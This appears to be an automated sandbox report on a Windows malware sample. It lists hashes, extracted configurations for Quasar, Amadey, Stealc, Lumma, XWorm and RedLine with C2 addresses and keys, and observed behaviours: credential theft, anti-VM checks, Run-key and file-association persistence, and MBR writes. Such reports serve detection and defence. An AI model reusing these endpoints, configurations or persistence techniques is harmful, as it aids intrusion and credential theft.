Resubmissions
27/02/2025, 06:33
250227-hbn4tszmx7 1026/02/2025, 23:57
250226-3zn4ysxwc1 1026/02/2025, 23:14
250226-271x2sxmz9 1014/02/2025, 01:10
250214-bjsnnayne1 1014/02/2025, 01:00
250214-bc5pmsymhw 1013/02/2025, 05:01
250213-fnkwtstpgw 1013/02/2025, 04:24
250213-e1kk6atmaz 1013/02/2025, 04:08
250213-eqe8patkgx 812/02/2025, 23:56
250212-3yzt3azrdx 10Analysis
-
max time kernel
165s -
max time network
608s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
26/11/2024, 19:01
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
quasar
1.4.1
Office04
192.168.100.18:4782
2cbe985c-9a4f-4f1f-a761-cd05d5feff4b
-
encryption_key
9493303F9F1D303190787B3D987F2DCB2BAF3CFD
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.0
Office04
137.184.144.245:4782
6cfe4a65-c41d-4b02-9ae9-e727a748ae84
-
encryption_key
B702BA239316FCF317B584A351F2EC1696EBE772
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
java updater
-
subdirectory
SubDir
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
default_valenciga
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
lumma
https://crib-endanger.sbs
https://faintbl0w.sbs
https://300snails.sbs
https://bored-light.sbs
https://3xc1aimbl0w.sbs
https://pull-trucker.sbs
https://fleez-inc.sbs
https://thicktoys.sbs
Extracted
xworm
5.0
45.141.26.170:7000
kkeD0iZ90XXPXCyz
-
Install_directory
%ProgramData%
-
install_file
VLC_Media.exe
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
redline
38.180.109.140:20007
Extracted
lumma
https://push-hook.cyou/api
Signatures
-
Amadey family
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 1 IoCs
resource yara_rule behavioral1/files/0x00290000000450b4-1582.dat family_ammyyadmin -
Ammyyadmin family
-
Asyncrat family
-
BabbleLoader
BabbleLoader is a malware loader written in C++.
-
Babbleloader family
-
Detect Neshta payload 50 IoCs
resource yara_rule behavioral1/files/0x002a000000045076-10.dat family_neshta behavioral1/files/0x0028000000045094-73.dat family_neshta behavioral1/files/0x0002000000042a25-147.dat family_neshta behavioral1/files/0x00010000000444be-157.dat family_neshta behavioral1/files/0x0001000000006829-185.dat family_neshta behavioral1/files/0x002a000000045096-190.dat family_neshta behavioral1/memory/1352-216-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral1/files/0x0003000000042b14-189.dat family_neshta behavioral1/files/0x0004000000040e40-217.dat family_neshta behavioral1/files/0x0003000000040ff1-220.dat family_neshta behavioral1/files/0x0002000000041150-219.dat family_neshta behavioral1/files/0x00020000000410ff-218.dat family_neshta behavioral1/files/0x00010000000443c0-188.dat family_neshta behavioral1/files/0x00010000000443bc-187.dat family_neshta behavioral1/files/0x000100000000687d-186.dat family_neshta behavioral1/files/0x0001000000006834-184.dat family_neshta behavioral1/files/0x000100000000682a-183.dat family_neshta behavioral1/files/0x0001000000006826-182.dat family_neshta behavioral1/files/0x0001000000006828-181.dat family_neshta behavioral1/files/0x0001000000006827-180.dat family_neshta behavioral1/files/0x0001000000015f5d-179.dat family_neshta behavioral1/files/0x0001000000015f5b-178.dat family_neshta behavioral1/files/0x0001000000015f59-177.dat family_neshta behavioral1/files/0x00010000000066f8-175.dat family_neshta behavioral1/files/0x00010000000066f9-174.dat family_neshta behavioral1/files/0x0001000000006700-172.dat family_neshta behavioral1/files/0x0001000000006776-170.dat family_neshta behavioral1/files/0x00010000000066de-169.dat family_neshta behavioral1/files/0x00010000000066e0-168.dat family_neshta behavioral1/files/0x00010000000066cb-167.dat family_neshta behavioral1/files/0x000100000000671e-166.dat family_neshta behavioral1/files/0x00010000000444c0-155.dat family_neshta behavioral1/files/0x000100000004447f-154.dat family_neshta behavioral1/files/0x0001000000044482-153.dat family_neshta behavioral1/files/0x00010000000444bf-152.dat family_neshta behavioral1/files/0x0001000000044481-150.dat family_neshta behavioral1/files/0x0001000000044480-149.dat family_neshta behavioral1/files/0x0002000000042a26-148.dat family_neshta behavioral1/files/0x0002000000042a24-146.dat family_neshta behavioral1/files/0x0001000000043b21-145.dat family_neshta behavioral1/files/0x0002000000042a7a-144.dat family_neshta behavioral1/memory/4584-233-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral1/memory/1988-252-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral1/memory/2920-258-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral1/memory/2792-259-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral1/memory/2816-261-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral1/memory/2844-262-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral1/memory/2920-265-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral1/memory/2844-266-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral1/memory/2920-283-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta -
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/files/0x00080000000364bc-2034.dat family_xworm behavioral1/memory/1276-2046-0x0000000000D90000-0x0000000000DA2000-memory.dmp family_xworm behavioral1/files/0x002b000000045218-5880.dat family_xworm behavioral1/files/0x002b000000045220-5907.dat family_xworm behavioral1/files/0x002900000004525f-7271.dat family_xworm -
Detects BabbleLoader Payload 1 IoCs
resource yara_rule behavioral1/files/0x0028000000045246-6892.dat family_babbleloader -
Detects ZharkBot payload 1 IoCs
ZharkBot is a botnet written C++.
resource yara_rule behavioral1/files/0x002a00000004524b-6941.dat zharkcore -
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Flawedammyy family
-
Lumma family
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Neshta family
-
Phorphiex family
-
Phorphiex payload 1 IoCs
resource yara_rule behavioral1/files/0x0003000000043388-1511.dat family_phorphiex -
Quasar family
-
Quasar payload 6 IoCs
resource yara_rule behavioral1/files/0x0028000000045091-65.dat family_quasar behavioral1/memory/3048-81-0x0000000000550000-0x0000000000874000-memory.dmp family_quasar behavioral1/files/0x002a000000045096-190.dat family_quasar behavioral1/files/0x002900000004509a-225.dat family_quasar behavioral1/memory/404-239-0x0000000000A10000-0x0000000000A94000-memory.dmp family_quasar behavioral1/files/0x002c00000004524c-7041.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/files/0x002b00000004521f-5903.dat family_redline behavioral1/memory/4604-5965-0x00000000002E0000-0x0000000000332000-memory.dmp family_redline -
Redline family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 1792 created 3624 1792 winn.exe 57 PID 1792 created 3624 1792 winn.exe 57 PID 1792 created 3624 1792 winn.exe 57 PID 1792 created 3624 1792 winn.exe 57 PID 1792 created 3624 1792 winn.exe 57 PID 1792 created 3624 1792 winn.exe 57 PID 1792 created 3624 1792 winn.exe 57 PID 1792 created 3624 1792 winn.exe 57 PID 1984 created 3624 1984 3058827245.exe 57 PID 1984 created 3624 1984 3058827245.exe 57 PID 4792 created 3624 4792 winupsecvmgr.exe 57 PID 4792 created 3624 4792 winupsecvmgr.exe 57 PID 4792 created 3624 4792 winupsecvmgr.exe 57 -
Xworm family
-
Zharkbot family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x002d00000004524a-6965.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 90B1CE~1.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TROJAN~1.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 230 568 rundll32.exe -
pid Process 4944 powershell.exe 4248 powershell.exe 3620 powershell.exe 2024 powershell.exe 3848 powershell.exe 5352 powershell.exe 3620 powershell.exe 1624 powershell.exe 3712 powershell.exe 1636 powershell.exe 1844 powershell.exe 1080 powershell.exe 3220 powershell.exe 5220 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts TROJAN~1.EXE -
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 90B1CE~1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TROJAN~1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TROJAN~1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 90B1CE~1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation AllNew.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Client.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation 2946613613.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation dxwebsetup.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation axplong.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 2920 dxwebsetup.exe 1456 dxwebsetup.exe 2388 dxwsetup.exe 2844 svchost.com 3048 client.exe 1352 Client.exe 4584 svchost.com 3104 Client.exe 2792 svchost.com 404 plswork.exe 1988 Client.exe 2816 svchost.com 396 Client.exe 3020 Client.exe 1992 Client.exe 1692 svchost.com 1792 winn.exe 4540 svchost.com 1564 CRYPTO~1.EXE 4332 svchost.com 5012 soft.exe 2436 CRYPTO~1.EXE 2856 svchost.com 1264 random.exe 2072 svchost.com 1088 axplong.exe 2892 svchost.com 1968 m.exe 1796 svchost.com 3832 axplong.exe 556 svchost.com 3896 axplong.exe 1296 sysnldcvmr.exe 2356 svchost.com 3484 TROJAN~1.EXE 3808 svchost.com 4808 backdoor.exe 4612 svchost.com 1840 axplong.exe 4468 svchost.com 3620 AA_v3.exe 1276 AA_v3.exe 3420 AA_v3.exe 4312 svchost.com 1368 axplong.exe 2940 svchost.com 4496 axplong.exe 4560 svchost.com 2892 axplong.exe 556 2946613613.exe 2076 svchost.com 676 svchost.com 4668 svchost.com 2124 axplong.exe 1536 svchost.com 788 axplong.exe 3996 svchost.com 2268 axplong.exe 3000 svchost.com 3576 axplong.exe 3288 248483651.exe 3360 axplong.exe 1856 svchost.com 4316 axplong.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine 90B1CE~1.EXE Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine axplong.exe -
Loads dropped DLL 31 IoCs
pid Process 2388 dxwsetup.exe 2388 dxwsetup.exe 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 2436 CRYPTO~1.EXE 568 rundll32.exe 4708 STEALC~1.EXE 4708 STEALC~1.EXE -
Modifies system executable filetype association 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" dxwebsetup.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x00290000000450b1-1548.dat themida behavioral1/memory/3484-1730-0x0000000000090000-0x0000000000C58000-memory.dmp themida behavioral1/memory/3484-1734-0x0000000000090000-0x0000000000C58000-memory.dmp themida behavioral1/memory/3484-2091-0x0000000000090000-0x0000000000C58000-memory.dmp themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" dxwebsetup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" m.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA TROJAN~1.EXE -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
flow ioc 807 0.tcp.eu.ngrok.io 833 0.tcp.in.ngrok.io 968 0.tcp.in.ngrok.io 171 discord.com 172 discord.com 473 raw.githubusercontent.com 750 0.tcp.eu.ngrok.io 772 0.tcp.eu.ngrok.io 959 0.tcp.eu.ngrok.io 26 raw.githubusercontent.com 27 raw.githubusercontent.com 472 raw.githubusercontent.com 716 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 107 ip-api.com 180 ip-api.com 622 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 AA_v3.exe File opened for modification \??\PhysicalDrive0 AA_v3.exe -
Drops file in System32 directory 19 IoCs
